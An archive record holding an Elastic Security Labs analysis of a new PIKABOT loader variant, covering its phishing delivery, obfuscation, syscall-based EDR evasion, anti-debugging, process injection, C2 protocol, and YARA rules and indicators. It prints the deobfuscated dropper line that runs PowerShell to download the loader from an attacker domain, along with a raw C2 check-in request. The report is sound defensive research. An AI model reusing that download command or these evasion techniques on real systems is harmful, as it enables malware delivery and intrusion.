{
	"id": "6f2d910c-53c6-4ed0-9e2e-2c9b9dc415d1",
	"created_at": "2026-04-06T00:08:25.829197Z",
	"updated_at": "2026-04-10T03:24:23.621899Z",
	"deleted_at": null,
	"sha1_hash": "df2f9aea1c00d54aa200336802d200c57aaf80f3",
	"title": "PIKABOT, I choose you!",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1100778,
	"plain_text": "PIKABOT, I choose you!\r\nBy Daniel Stepanic, Salim Bitam\r\nPublished: 2024-02-24 · Archived: 2026-04-05 18:32:04 UTC\r\nPIKABOT at a glance\r\nPIKABOT is a widely deployed loader malicious actors utilize to distribute payloads such as Cobalt Strike or launch\r\nransomware. On February 8th, the Elastic Security Labs team observed new PIKABOT campaigns, including an updated\r\nvariant. This version of the PIKABOT loader uses a new unpacking method and heavy obfuscation. The core module has\r\nadded a new string decryption implementation, changes to obfuscation functionality, and various other modifications.\r\nThis post will highlight the initial campaign, break down the new loader functionality, and review the core components.\r\nThere are interesting design choices in this new update that we think are the start of a new codebase that will make\r\nfurther improvements over time. While the functionality is similar to previous builds, these new updates have likely\r\nbroken signatures and previous tooling.\r\nDuring the development of this research, the ThreatLabz team at Zscaler released great analysis and insights into a\r\nsample overlapping with those in this post. 
We suggest reading their work along with ours to understand these PIKABOT\r\nchanges comprehensively.\r\nKey takeaways\r\nFresh campaigns involving significant updates to the PIKABOT loader and core components\r\nPIKABOT loader uses a new unpacking technique of combining scattered chunks of encrypted data in base64\r\nformat from the .data section\r\nChanges in the core include toned-down obfuscation and in-line RC4 functions, plaintext configuration at runtime,\r\nremoval of AES during network communications\r\nPIKABOT development appears as a work-in-progress, with future updates likely imminent\r\nCall-stack visibility using Elastic Security provides the ability to triage threats like PIKABOT rapidly\r\nPIKABOT campaign overview\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 1 of 20\n\nPIKABOT execution flow\r\nAs the new year started, PIKABOT distribution remained inactive until approximately two weeks ago. This new\r\ncampaign on February 8th involved emails with hyperlinks that led to ZIP archive files containing a malicious obfuscated\r\nJavaScript script.\r\nObfuscated JavaScript within ZIP archive\r\nBelow are the contents of the obfuscated JavaScript file, showing the next sequence to download and execute\r\nPIKABOT’s loader using PowerShell.\r\n// deobfuscated\r\nvar sites = ['https://gloverstech[.]com/tJWz9/', '', '']\r\nfor (var i = 0x0; i \u003c 3; i++)\r\n{\r\nvar obj = new ActiveXObject(\"WScript.Shell\")\r\nobj['Run'](\"powershell Invoke-WebRequest https://gloverstech[.]com/tJWz9/0.2343379541861872.dat -OutFile %SYST\r\n}\r\nPIKABOT loader\r\nLoader stage 1\r\nTo appear authentic, the developer tampered with a legitimate search and replace tool called grepWinNP3.exe from this\r\nrepository. 
Using our internal sandboxing project (Detonate) and leveraging Elastic Defend’s call stack feature provided a\r\ndetailed trace of the execution, allowing us to pinpoint the entry point of malicious code.\r\nAn analysis of the call stack data reveals that execution begins at a call before offset 0x81aa7 within the malicious file;\r\nthe execution then leaps to a memory allocation at a call prior to offset 0x25d84. Furthermore, it was observed that the\r\nprocess creation call stack is missing normal calls to KernelBase.dll!CreateProcessInternalW and\r\nntdll.dll!NtCreateUserProcess, due to the use of a syscall via shellcode execution residing in unbacked memory.\r\nThis implementation bypasses user-mode hooks on WOW64 modules to evade EDR products.\r\nAlert call stack for PIKABOT loader\r\nLooking into the offset 0x81aa7 of the malicious file and conducting a side-by-side code comparison with a verified,\r\nbenign version of the grepWinNP3.exe file, we identified something distinct and unusual: a hardcoded address to\r\nexecute the PIKABOT loader; this marks the entry point of the PIKABOT loader.\r\nEntry point to malicious code\r\nThe malicious code employs heavy obfuscation, utilizing a technique where a jump (JMP) follows each assembly\r\ninstruction. This approach significantly complicates analysis by disrupting the straightforward flow of execution.\r\nObfuscation involving a combination of instructions and jumps\r\nThe loader extracts its stage 2 payload from the .text section, where it is stored in chunks of 0x94 bytes, before\r\nconsolidating the pieces. 
It then employs a seemingly custom decryption algorithm, which utilizes bitwise operations.\r\nDecryption algorithm for stage 2 payload\r\nThe next step of the process is to reflectively load the PE file within the confines of the currently executing process. This\r\ntechnique involves dynamically loading the PE file's contents into memory and executing it, without the need for the file\r\nto be physically written to disk. This method not only streamlines the execution process by eliminating the necessity for\r\nexternal file interactions but also significantly enhances stealth by minimizing the digital footprint left on the host system.\r\nReflectively loading PE\r\nLoader stage 2\r\nThe stage 2 loader, tasked with initializing the PIKABOT core within a newly established process, employs a blend of\r\ncode and string obfuscation techniques similar to those found in the core itself. In addition to its obfuscation capabilities,\r\nthe loader incorporates a series of advanced anti-debugging countermeasures.\r\nAnti-debugging\r\nThe malware utilizes specific NTDLL Zw APIs for a variety of operations, including debugger detection, process\r\ncreation, and injection, aiming to stay under the radar of detection mechanisms and evade EDR (Endpoint Detection and\r\nResponse) user-land hooking, as well as debugging attempts.\r\nIt executes syscalls directly, bypassing conventional API calls that are more susceptible to monitoring and interception. It\r\nuses a wrapper function that facilitates the execution of syscalls in 64-bit mode and takes a hash of a Zw API name as\r\na parameter.\r\nFunction used to execute syscall by hash\r\nThe wrapper function extracts the syscall ID by parsing the loaded NTDLL and matching the hash of the Zw function\r\nname. 
After finding the correct syscall ID, it uses the Wow64Transition Windows API to execute the syscall in 64-bit\r\nmode.\r\nControl flow graph showing syscall passed to Wow64Transition\r\nNote that the parameters needed are pushed on the stack before the wrapper is called; the following example showcases a\r\nZwQueryInformationProcess call with the ProcessInformationClass set to ProcessDebugPort (7):\r\nSyscall parameters pushed on stack\r\nThe malware employs a series of anti-debugging techniques designed to thwart detection by debugging and forensic\r\ntools. These techniques include:\r\nCalling ZwQuerySystemInformation with the SystemKernelDebuggerInformation parameter to detect the\r\npresence of kernel debuggers.\r\nCalling ZwQueryInformationProcess with the ProcessInformationClass set to ProcessDebugPort to identify\r\nany debugging ports associated with the process.\r\nCalling ZwQueryInformationProcess again, but with the ProcessInformationClass set to ProcessDebugFlags,\r\nto ascertain if the process has been flagged for debugging.\r\nInspecting the Process Environment Block (PEB) for the BeingDebugged flag, which indicates if the process is\r\ncurrently being debugged.\r\nUsing GetThreadContext to detect hardware breakpoints.\r\nScanning the list of currently running processes to identify any active debugging or forensic tools.\r\nDecompilation of debugging checks\r\nInterestingly, we discovered a bug where some of the process names it checks have their first byte zeroed out; this could\r\nsuggest a mistake by the malware’s author or an unwanted side-effect added by the obfuscation tool. 
The full list of\r\nprocess names that are checked can be found at the end of this article.\r\nProcess names with missing first byte\r\nExecution\r\nThe loader populates a global variable with the addresses of essential APIs from the NTDLL and KERNEL32 libraries.\r\nThis step is pivotal for the malware's operation, as these addresses are required for executing subsequent tasks. Note that\r\nthe loader employs a distinct API name hashing algorithm, diverging from the one previously used for Zw APIs.\r\nAPIs retrieved for loading core component\r\nBelow is the reconstructed structure:\r\nstruct global_variable\r\n{\r\n int debugger_detected;\r\n void* LdrLoadDll;\r\n void* LdrGetProcedureAddress;\r\n void* RtlAllocateHeap;\r\n void* RtlFreeHeap;\r\n void* RtlDecompressBuffer;\r\n void* RtlCreateProcessParametersEx;\r\n void* RtlDestroyProcessParameters;\r\n void* ExitProcess;\r\n void* CheckRemoteDebuggerPresent;\r\n void* VirtualAlloc;\r\n void* GetThreadContext;\r\n void* VirtualFree;\r\n void* CreateToolhelp32Snapshot;\r\n void* Process32FirstW;\r\n void* Process32NextW;\r\n void* ntdll_module;\r\n void* kernel32_dll;\r\n int field_48;\r\n uint8_t* ptr_decrypted_PIKABOT_core;\r\n int decrypted_PIKABOT_core_size;\r\n TEB* TEB;\r\n};\r\nLoader structure\r\nThe malware then consolidates bytes of the PIKABOT core that are scattered in the .data section in base64-encoded\r\nchunks, which is noteworthy when compared to a previous version that loaded a set of PNGs from its resources\r\nsection.\r\nFunctions used to retrieve core payload in chunks\r\nIt executes a sequence of nine distinct functions, each performing similar operations but with varying arguments. Each\r\nfunction decrypts an RC4 key using an in-line process that utilizes strings that appear legitimate. 
The function then\r\nbase64-decodes each chunk before decrypting the bytes.\r\nDecryption functions using RC4 and base64\r\nAfter consolidating the decrypted bytes, it uses the RtlDecompressBuffer API to decompress them.\r\nPIKABOT loader using decompression function\r\nThe loader creates a suspended instance of ctfmon.exe using the ZwCreateUserProcess syscall, a tactic designed to\r\nmasquerade as a legitimate Windows process. Next, it allocates a large memory region remotely via the\r\nZwAllocateVirtualMemory syscall to house the PIKABOT core's PE file.\r\nSubsequently, the loader writes the PIKABOT core into the newly allocated memory area using the\r\nZwWriteVirtualMemory syscall. It then redirects the execution flow from ctfmon.exe to the malicious PIKABOT core\r\nby calling the SetContextThread API to change the thread's execution address. Finally, it resumes the thread with the\r\nZwResumeThread syscall.\r\nSyscall execution of core payload\r\nPIKABOT core\r\nThe overall behavior and functionality of the updated PIKABOT core are similar to previous versions: the bot collects\r\ninitial data from the victim machine and presents the threat actor with command and control access to enable post-compromise behavior such as command-line execution, discovery, or launching additional payloads through injection.\r\nThe notable differences include:\r\nNew style of obfuscation with fewer in-line functions\r\nMultiple implementations for decrypting strings\r\nPlaintext configuration at runtime, removal of JSON format\r\nNetwork communication uses RC4 plus byte swapping, removal of AES\r\nObfuscation\r\nOne of the most apparent differences is centered around the obfuscation of PIKABOT. This version contains a drastically\r\nless obfuscated binary but provides a familiar feel to older versions. Instead of a barrage of in-line RC4 functions, there\r\nare only a few left after the new update. 
Unfortunately, there is still a great deal of obfuscation applied to global variables\r\nand junk instructions.\r\nBelow is a typical example of junk code being inserted in between the actual malware’s code, solely to extend analysis\r\ntime and add confusion.\r\nObfuscation using global variables\r\nString Decryption\r\nAs mentioned previously, there are still some in-line RC4 functions used to decrypt strings. In previous versions, the core\r\nused base64 encoding as an additional step in combination with AES and RC4 to obscure the strings; in this core\r\nversion, we haven’t seen base64 encoding or AES used for string decryption.\r\nHere’s an instance of a remaining in-line RC4 function used to decrypt the hardcoded mutex. In this version, PIKABOT\r\ncontinues its trademark use of legitimate strings as the RC4 key to decrypt data.\r\nIn-line RC4\r\nString decryption using RC4 with benign strings\r\nIn this new version, PIKABOT includes a different implementation for string obfuscation by using stack strings and\r\nplacing individual characters into an array in a randomized order. Below is an example using netapi32.dll:\r\nStack string placement using netapi32.dll\r\nAnti-debugging\r\nIn terms of anti-debugging in this version, PIKABOT checks the BeingDebugged flag in the PEB along with using\r\nCheckRemoteDebuggerPresent. In our sample, a hardcoded value (0x2500) is returned if a debugger is attached. These\r\nchecks unfortunately are not in a single place, but scattered in different places throughout the binary, for example right\r\nbefore network requests are made.\r\nDebugger check\r\nExecution\r\nRegarding execution and overall behaviors, PIKABOT’s core closely follows the execution flow of older versions. 
Upon\r\nexecution, PIKABOT parses the PEB and uses API hashing to resolve needed libraries at runtime. Next, it validates the\r\nvictim machine by verifying the language identifier using GetUserDefaultLangID. If the LangID is set to Russian\r\n(0x419) or Ukrainian (0x422), the malware will immediately stop its execution.\r\nLanguage check\r\nAfter the language check, PIKABOT creates a mutex to prevent reinfection on the same machine. Our sample used the\r\nfollowing mutex: {6F70D3AF-34EF-433C-A803-E83654F6FD7C}\r\nNext, the malware will generate a UUID from the victim machine using the system volume number in combination with\r\nthe hostname and username. PIKABOT will then generate a unique RC4 key seeded by RtlRandomEx and then place the\r\nkey into the config structure to be used later during its network communications.\r\nInitial Collection\r\nThe next phase involves collecting victim machine information and placing the data into a custom structure that will then\r\nbe encrypted and sent out after the initial check-in request. 
The following actions are used to fingerprint and identify the\r\nvictim and their network:\r\nRetrieves the name of the user associated with the PIKABOT thread\r\nRetrieves the computer name\r\nGets processor information\r\nGrabs display device information using EnumDisplayDevicesW\r\nRetrieves domain controller information using DsGetDcNameW\r\nCollects current physical and virtual memory usage using GlobalMemoryStatusEx\r\nGets the window dimensions using GetWindowRect, which is used to identify sandbox environments\r\nRetrieves Windows OS product information using RtlGetVersion\r\nUses CreateToolhelp32Snapshot to retrieve process information\r\nVictim information retrieved such as username, computer name, etc.\r\nConfig\r\nOne strange development decision in this new version is around the malware configuration. At runtime, the configuration\r\nis in plaintext and located in one spot in memory. This does eventually get erased in memory. We believe this will only\r\nbe temporary, as previous versions protected the configuration and doing so has become a standard expectation when dealing\r\nwith prevalent malware families.\r\nConfiguration in plaintext at core runtime\r\nNetwork\r\nPIKABOT performs network communication over HTTPS on non-traditional ports (2967, 2223, etc.) using the User-Agent\r\nMicrosoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro). The build number of the PIKABOT\r\ncore module is concatenated from the config and is passed within the encrypted network\r\nrequests; the version we analyzed is labeled 1.8.32-beta.\r\nNew PIKABOT version on the stack\r\nOn this initial check-in request to the C2 server, PIKABOT registers the bot while sending the previously collected\r\ninformation encrypted with RC4. 
The RC4 key is sent in this initial packet at offset 0x10. As mentioned previously,\r\nPIKABOT no longer uses AES in its network communications.\r\nPOST https://158.220.80.167:2967/api/admin.teams.settings.setIcon HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.8\r\nUser-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)\r\nContent-Length: 6778\r\nHost: 158.220.80.167:2967\r\n00001a7600001291000016870000000cbed67c4482a40ad2fc20924a06f614a40256fca898d6d2e88eecc638048874a8524d73037ab3b003be6453b\r\nPIKABOT initial check-in request\r\nFor each outbound network request, PIKABOT randomly chooses one of the following URIs:\r\n/api/admin.conversations.convertToPrivate\r\n/api/admin.conversations.getConversationPrefs\r\n/api/admin.conversations.restrictAccess.removeGroup\r\n/api/admin.emoji.add\r\n/api/admin.emoji.addAlias\r\n/api/admin.emoji.list\r\n/api/admin.inviteRequests.approved.list\r\n/api/admin.teams.admins.list\r\n/api/admin.teams.settings.setIcon\r\n/api/admin.usergroups.addTeams\r\n/api/admin.users.session.reset\r\n/api/apps.permissions.users.list\r\nList of URIs used in PIKABOT C2 requests\r\nUnlike previous versions, in which victim data was placed in a structured JSON format, the data within these\r\nrequests is raw bytes. The first 16 bytes are used to pass specific config information (bot command ID, byte shift, etc.).\r\nThe next 32 bytes embed the RC4 key for the session, followed by the encrypted data.\r\nThere is one additional transformation where the developers added a random shift of bytes that occurs at runtime. This\r\nnumber (0x18) at offset 0xF in the example request below represents the number of bytes to shift from the end of the\r\nencrypted data to the start of the encrypted data. 
In our example, to successfully decrypt the data, the last 18 bytes would\r\nneed to be placed in front of bytes (0xDA 0x9E).\r\nHex view of network request on initial check-in\r\nBot Functionality\r\nIn terms of the core bot functionality, it is similar to previous versions: executing commands, performing discovery, as\r\nwell as process injection capabilities. From our perspective, it still seems very much like a work in progress. One\r\ncommand ID (0x982) is an empty function; in another case, three unique command IDs point to the same\r\nfunction. These indicate that this software is not quite complete.\r\nCommand ID Description\r\n0x1FED Beacon timeout\r\n0x1A5A Exits the PIKABOT process\r\n0x2672 Includes obfuscation, but appears to not do anything meaningful\r\n0x246F Creates file on disk and modifies registry tied to configuration\r\n0xACB Command-line execution with output\r\n0x36C PE inject in a remote process\r\n0x792 Shellcode inject in a remote process\r\n0x359, 0x3A6, 0x240 Command-line execution similar to 0xACB, uses custom error code (0x1B3)\r\n0x985 Process enumeration, similar to initial victim collection enumeration\r\n0x982 Empty function\r\nMalware and MITRE ATT\u0026CK\r\nElastic uses the MITRE ATT\u0026CK framework to document common tactics, techniques, and procedures that advanced\r\npersistent threats use against enterprise networks.\r\nTactics\r\nTactics represent the why of a technique or sub-technique. 
It is the adversary’s tactical goal: the reason for performing an\r\naction.\r\nInitial Access\r\nExecution\r\nDefense Evasion\r\nDiscovery\r\nCommand and Control\r\nExfiltration\r\nTechniques\r\nTechniques represent how an adversary achieves a tactical goal by performing an action.\r\nPhishing\r\nUser Execution: Malicious Link\r\nReflective Code Loading\r\nSystem Information Discovery\r\nProcess Injection\r\nEncrypted Channel\r\nDetecting malware\r\nPrevention\r\nNetwork Module Loaded from Suspicious Unbacked Memory\r\nShellcode Execution from Low Reputation Module\r\nSuspicious Memory Write to a Remote Process\r\nSuspicious Remote Memory Allocation\r\nProcess Creation with Unusual Mitigation\r\nWindows.Trojan.PikaBot\r\nYARA\r\nElastic Security has created YARA rules to identify this activity. Below are YARA rules to identify PIKABOT:\r\nrule Windows_Trojan_Pikabot_5441f511 {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2024-02-15\"\r\n last_modified = \"2024-02-15\"\r\n license = \"Elastic License v2\"\r\n description = \"Related to PIKABOT core\"\r\n os = \"Windows\"\r\n arch = \"x86\"\r\n threat_name = \"Windows.Trojan.PIKABOT\"\r\n strings:\r\n $handler_table = { 72 26 [6] 6F 24 [6] CB 0A [6] 6C 03 [6] 92 07 }\r\n $api_hashing = { 3C 60 76 ?? 83 E8 20 8B 0D ?? ?? ?? ?? 6B FF 21 }\r\n $debug_check = { A1 ?? ?? ?? ?? FF 50 ?? 50 50 80 7E ?? 01 74 ?? 83 7D ?? 00 75 ?? }\r\n $checksum = { 55 89 E5 8B 55 08 69 02 E1 10 00 00 05 38 15 00 00 89 02 5D C3 }\r\n $load_sycall = { 8F 05 ?? ?? ?? ?? 83 C0 04 50 8F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04 A3 ?? ?? ?? ?? 31 C0 6\r\n $read_xbyte_config = { 8B 43 04 8B 55 F4 B9 FC FF FF FF 83 C0 04 29 D1 01 4B 0C 8D 0C 10 89 4B 04 85 F6 ?? ?? 
8\r\n condition:\r\n 2 of them\r\n}\r\nrule Windows_Trojan_Pikabot_95db8b5a {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2024-02-15\"\r\n last_modified = \"2024-02-15\"\r\n license = \"Elastic License v2\"\r\n description = \"Related to PIKABOT loader\"\r\n os = \"Windows\"\r\n arch = \"x86\"\r\n threat_name = \"Windows.Trojan.PIKABOT\"\r\n strings:\r\n $syscall_ZwQueryInfoProcess = { 68 9B 8B 16 88 E8 73 FF FF FF }\r\n $syscall_ZwCreateUserProcess = { 68 B2 CE 2E CF E8 5F FF FF FF }\r\n $load_sycall = { 8F 05 ?? ?? ?? ?? 83 C0 04 50 8F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04 A3 ?? ?? ?? ?? 31 C0 6\r\n $payload_chunking = { 8A 84 35 ?? ?? ?? ?? 8A 95 ?? ?? ?? ?? 88 84 1D ?? ?? ?? ?? 88 94 35 ?? ?? ?? ?? 02 94 1D\r\n $loader_rc4_decrypt_chunk = { F7 FF 8A 84 15 ?? ?? ?? ?? 89 D1 8A 94 1D ?? ?? ?? ?? 88 94 0D ?? ?? ?? ?? 8B 55\r\n condition:\r\n 2 of them\r\n}\r\nObservations\r\nAll observables are also available for download in both ECS and STIX format.\r\nThe following observables were discussed in this research.\r\nObservable Type Name Reference\r\n2f66fb872c9699e04e54e5eaef982784b393a5ea260129a1e2484dd273a5a88b SHA-256 Opc.zip Zip archive holding obfuscated JavaScript\r\nca5fb5814ec62c8f04936740aabe2664b3c7d036203afbd8425cd67cf1f4b79d SHA-256 grepWinNP3.exe PIKABOT loader\r\n139.84.237[.]229:2967 ipv4-addr PIKABOT C2 server\r\n85.239.243[.]155:5000 ipv4-addr PIKABOT C2 server\r\n104.129.55[.]104:2223 ipv4-addr PIKABOT C2 server\r\n37.60.242[.]85:9785 ipv4-addr PIKABOT C2 server\r\n95.179.191[.]137:5938 ipv4-addr PIKABOT C2 server\r\n65.20.66[.]218:5938 ipv4-addr PIKABOT C2 server\r\n158.220.80[.]157:9785 ipv4-addr PIKABOT C2 server\r\n104.129.55[.]103:2224 ipv4-addr PIKABOT C2 server\r\n158.220.80[.]167:2967 ipv4-addr PIKABOT C2 server\r\nentrevientos.com[.]ar domain Hosting infra for zip archive\r\ngloverstech[.]com domain Hosting infra for PIKABOT loader\r\nReferences\r\nThe following were referenced throughout the above research:\r\nhttps://www.zscaler.com/blogs/security-research/d-evolution-PIKABOT\r\nhttps://x.com/Cryptolaemus1/status/1755655639370514595?s=20\r\nAppendix\r\nProcess Name Checks\r\ntcpview.exe\r\nfilemon.exe\r\nautoruns.exe\r\nautorunsc.exe\r\nProcessHacker.exe\r\nprocmon.exe\r\nprocexp.exe\r\nidaq.exe\r\nregmon.exe\r\nidaq64.exe\r\nx32dbg.exe\r\nx64dbg.exe\r\nFiddler.exe\r\nhttpdebugger.exe\r\ncheatengine-i386.exe\r\ncheatengine-x86_64.exe\r\ncheatengine-x86_64-SSE4-AVX2.exe\r\nPETools.exe\r\nLordPE.exe\r\nSysInspector.exe\r\nproc_analyzer.exe\r\nsysAnalyzer.exe\r\nsniff_hit.exe\r\nwindbg.exe\r\njoeboxcontrol.exe\r\njoeboxserver.exe\r\nResourceHacker.exe\r\nImmunityDebugger.exe\r\nWireshark.exe\r\ndumpcap.exe\r\nHookExplorer.exe\r\nImportREC.exe\r\nSource: https://www.elastic.co/security-labs/pikabot-i-choose-you",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.elastic.co/security-labs/pikabot-i-choose-you"
	],
	"report_names": [
		"pikabot-i-choose-you"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434105,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/df2f9aea1c00d54aa200336802d200c57aaf80f3.pdf",
		"text": "https://archive.orkl.eu/df2f9aea1c00d54aa200336802d200c57aaf80f3.txt",
		"img": "https://archive.orkl.eu/df2f9aea1c00d54aa200336802d200c57aaf80f3.jpg"
	}
}